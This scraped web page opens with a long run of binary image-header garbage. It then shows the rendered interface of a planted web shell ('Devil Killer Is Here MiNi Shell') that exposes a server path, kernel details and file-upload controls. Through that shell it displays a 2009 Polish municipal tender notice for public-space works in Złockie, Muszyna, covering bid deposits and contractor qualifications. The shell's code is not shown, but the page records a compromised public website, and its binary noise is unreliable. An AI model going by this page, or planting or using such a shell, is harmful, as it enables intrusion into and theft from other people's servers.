JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090410/101332-N-2009.html

<p class="kh_header"><b>Muszyna: Kompleksowe zagospodarowanie przestrzeni publicznej w centrum wsi Złockie w Gminie Muszyna zgodnie z funkcją turystyczno-uzdrowiskową o numerze MRPO.06.02.01-12-158/08-00-IXA/140/FE/09 w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013, oś Priorytetowa 6. Spójność wewnątrzregionalna, Działanie 6.2 Rozwój obszarów wiejskich, Schemat A: Odnowa centrum wsi, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego</b><br>
<b>Numer ogłoszenia: 101332 - 2009; data zamieszczenia: 10.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Uzdrowiskowa Muszyna - Burmistrz Miasta i Gminy Uzdrowiskowej Muszyna , Rynek 31, 33-370 Muszyna, woj. małopolskie, tel. 018 4714009 w. 18, faks 018 4777921.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muszyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe zagospodarowanie przestrzeni publicznej w centrum wsi Złockie w Gminie Muszyna zgodnie z funkcją turystyczno-uzdrowiskową o numerze MRPO.06.02.01-12-158/08-00-IXA/140/FE/09 w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013, oś Priorytetowa 6. Spójność wewnątrzregionalna, Działanie 6.2 Rozwój obszarów wiejskich, Schemat A: Odnowa centrum wsi, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Remont istniejącego ciągu pieszo-rowerowego - deptak główny dł. 796 m
- chodniki z kostki brukowej o gr. 6 cm - 3 582,00 m2
- nawierzchnia asfaltowa gr. 7 cm wraz z podbudową - 1 567,50 m2 
2.Trasa rowerowo-kuligowa o dł. 2.875 m
- nawierzchnia asfaltowa gr. 7 cm wraz z podbudową- 2 673,00 m 2
- pobocze z tłucznia kamiennego gr. 7 cm- 891,00 m2
- nawierzchnia żwirowo- tłuczniowa gr. 33 cm - 7 936,00 m2
3. Droga i chodnik do Jasieńczyka
- nawierzchnia asfaltowa gr. 7 cm wraz z podbudową- 2 588,50 m2
- pobocze z tłucznia kamiennego gr. 7 cm - 497,70 m2
- chodnik z kostki brukowej o gr. 6 cm - 1 279,80 m2
4. Droga przy centrum handlowym na dł. 198 m 
- nawierzchnia asfaltowa gr. 7 cm wraz z podbudową- 594,00 m2
- pobocze z tłucznia kamiennego gr 7 cm- 198,00 m2
5. Plac zabaw obok centrum handlowego - kpl.1
6. Plac zabaw obok kościoła + oświetlenie - kpl. 1.
- 3 punkty świetlne
7. Infrastruktura towarzysząca: Przebudowa istniejącej sieci wodociągowej wraz z przebudową przyłączy wodociągowych na odcinku o dł. 1685,6 m. 
- PE 315 - 1679,60 m
- PE 160 - 602,10 m
8. Instalacja monitoringu - 4 kamery
9. Oświetlenie drogi i chodnika do Jasieńczyka (odwiert Złockie 8)- 16 punktów świetlnych.
10. Oświetlenie trasa rowerowo-kuligowa (odwiert Złockie - Szkoła)- 23 punkty świetlne.
11. Tablica informacyjna nr 1 (obok centrum handlowego) - 1kpl.
12. Tablica informacyjna nr 2 (koniec deptaka)	- 1kpl.
13. Tablica informacyjna nr 2 (obok zabytkowego drewnianego kościółka)- 1kpl..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.91-4, 45.23.13.00-8, 45.23.32.22-1, 45.23.32.20-7, 45.11.27.23-9, 29.83.50.00-1, 45.31.61.10-9, 45.11.12.91-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagane wadium;
120.000,00 zł.
Wadium należy wnieść przed upływem terminu składania ofert.
1. Forma wadium:
1) Wadium może być wniesione w następujących formach: 
a) pieniądzu; 
b) poręczeniach bankowych; 
c) gwarancjach bankowych; 
d) gwarancjach ubezpieczeniowych; 
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). 
2) W przypadku składania przez Wykonawcę wadium w formie gwarancji/poręczenia, gwarancja/poręczenie powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy: 
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta/poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, 
b) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem, 
c) kwotę gwarancji/poręczenia, 
d) termin ważności gwarancji/poręczenia 
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji/poręczenia na pierwsze pisemne 	żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie, lub 
- nie wniósł zabezpieczenia należytego wykonania umowy, lub 
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
- nie złożył dokumentów lub oświadczeń na wezwanie zamawiającego, zgodnie z art. 46 ust. 4a Pzp.
f) Gwarancja/poręczenia ma być nieodwołalne, bezwarunkowe, płatne na pisemne żądanie 	Zamawiającego i nieprzenośne na osoby trzecie. 
Miejsce i sposób wniesienia wadium:
1) Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego: 35 8809 0005 2001 0000 0648 0003 z dopiskiem: wadium dla przetargu: Kompleksowe zagospodarowanie przestrzeni publicznej w centrum wsi Złockie w Gminie Muszyna zgodnie z funkcją turystyczno-uzdrowiskową o numerze MRPO.06.02.01-12-158/08-00-IXA/140/FE/09 w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013, oś Priorytetowa 6. Spójność wewnątrzregionalna, Działanie 6.2 Rozwój obszarów wiejskich, Schemat A: Odnowa centrum wsi, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego
2) Wadium wnoszone w innych dopuszczonych przez Zamawiającego formach należy dołączyć w  oryginale do oferty. 
3) Wykonawca zostanie wykluczony z niniejszego postępowania, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona akceptowaną przez Zamawiającego formą wadium w wymaganej wysokości. 
4) Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie do 	złożenia lub uzupełnienia oświadczeń, dokumentów lub pełnomocnictw nie złoży dokumentów lub oświadczeń potwierdzających spełnianie warunków udziału w postępowaniu lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział wykonawcy spełniający warunki zawarte w art. 22 ust. 1 Ustawy zamówień dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 655 z późn. zm.) oraz określone przez zamawiającego poniżej:
4.1 Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:
1) posiadać uprawnienia do wykonywania działalności lub czynności w zakresie 	odpowiadającym przedmiotowi zamówienia. 
a)	W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące dokumenty: 
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich), 
b)	dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Dokumenty te obejmują:
- uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w	budownictwie, w zakresie kierowania bez ograniczeń robotami budowlanymi 	i instalacyjnymi,
- aktualne zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa. Powyższe dokumenty mogą być złożone w formie kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę.
2) nie podlegać wykluczeniu z postępowania na podstawie art. 24 ustawy z dnia 29 stycznia 	2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r Nr 223, poz. 1655 z późn. zm). 	W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są 	złożyć 	oświadczenie (zawierające również oświadczenie dot. spełniania warunków zawartych 	w art. 22 ustawy pzp) - załącznik nr 1, a także przedłożyć następujące dokumenty 	(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch 	lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla 	każdego z nich): 
a) aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie 	właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie 	określonym w art. 24 ust. 1 pkt 4-8 u.p.z.p. wystawiona nie wcześniej niż 6 miesięcy przed 	upływem terminu składania ofert; 
b) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 	1 pkt 9 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu 	składania ofert, dotyczy tylko podmiotów zbiorowych w rozumieniu ustawy Pzp
c) aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

4.2. Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzaju dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy:
1) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, 	zamiast dokumentów, o których mowa powyżej w pkt 4.1.1)a) oraz 4.1.2)a)b)c), składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce 	zamieszkania, potwierdzające odpowiednio, że: 
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie; 
c) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne 	albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 	płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
2) jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce 	zamieszkania, nie wydaje się dokumentów, o których mowa powyżej w pkt 4.1.2)a)b)c), zastępuje 	się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem 	sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 	odpowiednio w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce 	zamieszkania. 
3) Dokumenty, o których mowa powyżej, potwierdzające spełnianie warunków udziału w 	postępowaniu, sporządzone w języku obcym są składane w formie oryginału, odpisu, wypisu, 	wyciągu lub kopii wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. 	Wykonawca(cy) winni złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu. 	Dokument ten może być złożony przez każdego z Wykonawców składających ofertę 	wspólną(jedynie w sytuacji, jeśli każdy z nich spełnia wszystkie warunki samodzielnie), albo może 	być złożony wspólnie, lecz w takim wypadku oświadczenie musi być złożone i podpisane przez 	pełnomocnika lub przez osoby reprezentujące wszystkich wykonawców.

5. Zdolność ekonomiczna i finansowa
	Informacje i formalności konieczne do dokonania oceny spełniania wymogów.
	Wykonawca winien znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 	niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki 	(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego 	zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty 	ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą 	spełnianie tego warunku), tzn: 
5.1) posiadać w ostatnich 3 latach obrotowych prowadzonej działalności, a jeżeli okres prowadzenia 	jest krótszy, to w tym okresie, średniorocznie przychody netto w kwocie minimum 5 mln PLN( rok 	obrotowy - rozumie się przez to rok kalendarzowy lub inny okres trwający 12 kolejnych miesięcy 	kalendarzowych). 
	W celu potwierdzenia spełnienia niniejszego warunku Wykonawca (każdy z Wykonawców 	składających ofertę wspólną) zobowiązany jest przedłożyć rachunek zysków i strat, a w przypadku 	Wykonawcy nie zobowiązanego do sporządzania sprawozdania finansowego, innych dokumentów 	określających przychody netto ze sprzedaży - za okres ostatnich 3 lat obrotowych, a jeżeli okres 	prowadzenia działalności jest krótszy - za ten okres, 
5.2) posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności 	o wartości nie mniejszej niż 4.000.000,00 zł. W celu potwierdzenia spełniania niniejszego warunku 	Wykonawca (każdy z Wykonawców składających ofertę wspólną) musi załączyć do oferty oryginał 	lub poświadczoną za zgodność z oryginałem kopię polisy lub inny/-e dokument/-y, potwierdzający/-	e, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 	gospodarczej.

6. Zdolność techniczna
	Informacje i formalności konieczne do dokonania oceny spełniania wymogów:
	Wykonawca powinien posiadać niezbędną wiedzę i doświadczenie oraz potencjał techniczny, 	a także dysponować osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawić 	pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób 	zdolnych do wykonania zamówienia;
	W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego 	ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie 	ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie): 
6.1) zatrudnia kierownika budowy (lub kierownika budowy i kierowników robót) posiadającego 	(posiadających) uprawnienia do kierowania robotami bez ograniczeń, które pozwalają na 	kierowanie robotami budowlanymi w specjalności; konstrukcyjno budowlanej, drogowej, 	instalacyjnej w zakresie sieci, gazowych, wodociągowych i kanalizacyjnych, instalacyjnej 	w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (art. 14 ust. 1 ustawy 	z dnia 07 lipca 1994 r. Prawo budowlane Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.). 	W przypadku uprawnień budowlanych wydanych wcześniej, uprawnienia do kierowania robotami 	budowlanymi muszą odpowiadać zakresem powyższemu.
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć informację na temat liczby zatrudnionych kierowników robót/budowy (rozumiemy przez to także §1 ust. 2 pkt 5 i 5a rozporządzenia w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane) - załącznik nr 2, (wzór wykazu) wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Należy do załącznika nr 2 dołączyć kopie zaświadczeń o przynależności do Izby Samorządu Zawodowego, kserokopie wymaganych uprawnień zawodowych dla wszystkich kierowników robót/budowy.
Zaświadczenia i uprawnienia mogą być złożone w formie kserokopii potwierdzonych za zgodność z oryginałem przez Wykonawcę. 
6.2) Wymagane jest, aby Wykonawca w ciągu ostatnich 5 lat przed dniem publikacji ogłoszenia o 	zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonywał 	roboty budowlane odpowiadające specyfiką przedmiotowi zamówienia (roboty związane z budową 	sieci wodociągowych, budową nawierzchni z kostki brukowej i asfaltowej), z których każda na 	kwotę minimum 1,3 mln PLN bez podatku VAT, w tym wymaga się, aby co najmniej jedna 	inwestycja była z zakresu ochrony środowiska, o wartości robót minimum 1,3 mln PLN bez 	podatku VAT.
	W celu potwierdzenia spełniania niniejszego warunku, Wykonawcy zobowiązani są przedłożyć 	wykaz wykonanych robót budowlanych: nie mniej niż 3 wykonane roboty: 
	- dwie odpowiadające specyfiką przedmiotowi zamówienia: jedna inwestycja związana z budową 	lub przebudową nawierzchni z kostki brukowej o pow. min 2000 m2, jedna inwestycja związana 	z budową lub przebudową nawierzchni z asfaltu o pow. min 7000 m2, 
	- jedna robota budowlana z zakresu ochrony środowiska (budowa magistrali wodociągowej) 	o średnicy od 160 mm do 315 mm dł min. 1000 mb i (budowa wodociągu) o średnicy 160 mm dł. 	min. 500 mb
Należy przedłożyć wykaz wykonanych robót budowlanych (nie mniej niż 3) - załącznik nr 3 wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie (referencje).
W celu potwierdzenia, że Wykonawca dysponuje potencjałem technicznym (lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego), Wykonawca winien przedłożyć informacje na temat sprzętu, urządzeń jakie posiada w celu realizacji zamówienia - załącznik nr 4.
Zamawiający dokona oceny spełniania warunków na podstawie załączonych do wniosku oświadczeń i dokumentów, przy zastosowaniu formuły: spełnia/nie spełnia.
7. Ocena stopnia spełniania warunków:
7.1. Znaczenie warunku: złożenia wymaganych dokumentów - bez znaczenia punktowego - ocena ich spełnienia polega na określeniu kryterium - spełnia/nie spełnia. 
Nie spełnienie jednego kryterium powoduje odrzucenie wniosku.
7.2. Za wykazanie minimalnego zakresu robót budowlanych (3 obligatoryjne, tzn.: 2 odpowiadające specyfiką przedmiotowi zamówienia (tj. 1 inwestycja związana z budową lub przebudową nawierzchni z kostki brukowej o pow. min 2000 m2, 1 inwestycja związana z budową lub przebudową nawierzchni z asfaltu o pow. min 7000 m2, oraz 1 robota budowlana z zakresu ochrony środowiska (budowa magistrali wodociągowych) o średnicy od 160 mm do 315 mm dł min. 1000 mb i (budowa wodociągu) o średnicy 160 mm dł min. 500 mb) Zamawiający przyzna 10 pkt. 
Za każde następne (nie więcej niż 3 dodatkowe roboty ponad minimalny zakres spełniające opisane powyżej parametry) związane z ochroną środowiska (budowa sieci wodociągowych - opis ten stanowi katalog zamknięty, nie dopuszcza żadnych innych prac) - 20 pkt za każdą wykazaną robotę (maksymalna liczba punktów - 60).
Z tym, że w przypadku załączenia referencji dla magistrali wodociągowej; średnicy 160 mm liczba punktów zostanie pomnożona przez współczynnik 0,8, średnicy 225 mm liczba punktów zostanie pomnożona przez współczynnik 0,9, średnicy 315 mm liczba punktów zostanie pomnożona przez współczynnik 1,0.
Za każde następne (nie więcej jednak niż 6 dodatkowych robót ponad minimalny zakres) odpowiadające specyfiką przedmiotowi zamówienia (inwestycje związane z budową nawierzchni z kostki brukowej lub asfaltowej o pow. odpowiednio 2000 m2 i 7000 m2) - 5 punktów za każdą wykazaną robotę  (maksymalnie można uzyskać 30 pkt).
W sumie, minimalnie uzyskać można 10 pkt (przy wykazaniu minimalnej ilości robót wymaganej przez Zamawiającego, tzn. 3 robót).
W sumie, maksymalnie uzyskać można 100 pkt (przy wykazaniu maksymalnej ilości robót wymaganej przez Zamawiającego, tzn. 12 robót).
Ocena stopnia spełniania warunków polegać będzie na określeniu łącznej ilości punktów (zawierającej się w przedziale 10-100 pkt) uzyskanych za ww. roboty i będzie równa sumie łącznej ilości punktów za powyższe. Najwyższą ocenę otrzyma wniosek z maksymalną ilością punktów, kolejne wnioski otrzymają oceny równe ilości uzyskanych punktów.
Do udziału w postępowaniu zostaną zaproszeni Wykonawcy, którzy otrzymali najwyższą liczbę punktów, obliczoną zgodnie z powyższym i złożyli stosowne dokumenty.
W przypadku, gdyby ilość wniosków z tą samą maksymalną punktacją była większa niż 5, wszyscy wykonawcy, którzy złożyli w/w wnioski zostaną zaproszeni do udziału w postępowaniu. 
W przypadku gdyby wnioski znajdujące się na liście rankingowej utworzonej malejąco na podstawie otrzymanych punktów, miały tą samą ilość punktów, miejsca na liście określone będą dla w/w wniosków alfabetycznie. 
Do udziału w postępowaniu (do złożenia ofert) zaproszeni zostaną również Ci wykonawcy, których wnioski otrzymały taką samą liczbę punktów, jak wniosek będący na miejscu 1-5 na liście rankingowej, a którzy ze względu na kolejność alfabetyczną zajęli miejsca 6 i niższe..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a)	W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące dokumenty: 
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich), 
b)	dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Dokumenty te obejmują:
- uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w	budownictwie, w zakresie kierowania bez ograniczeń robotami budowlanymi 	i instalacyjnymi,
- aktualne zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa. Powyższe dokumenty mogą być złożone w formie kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę.
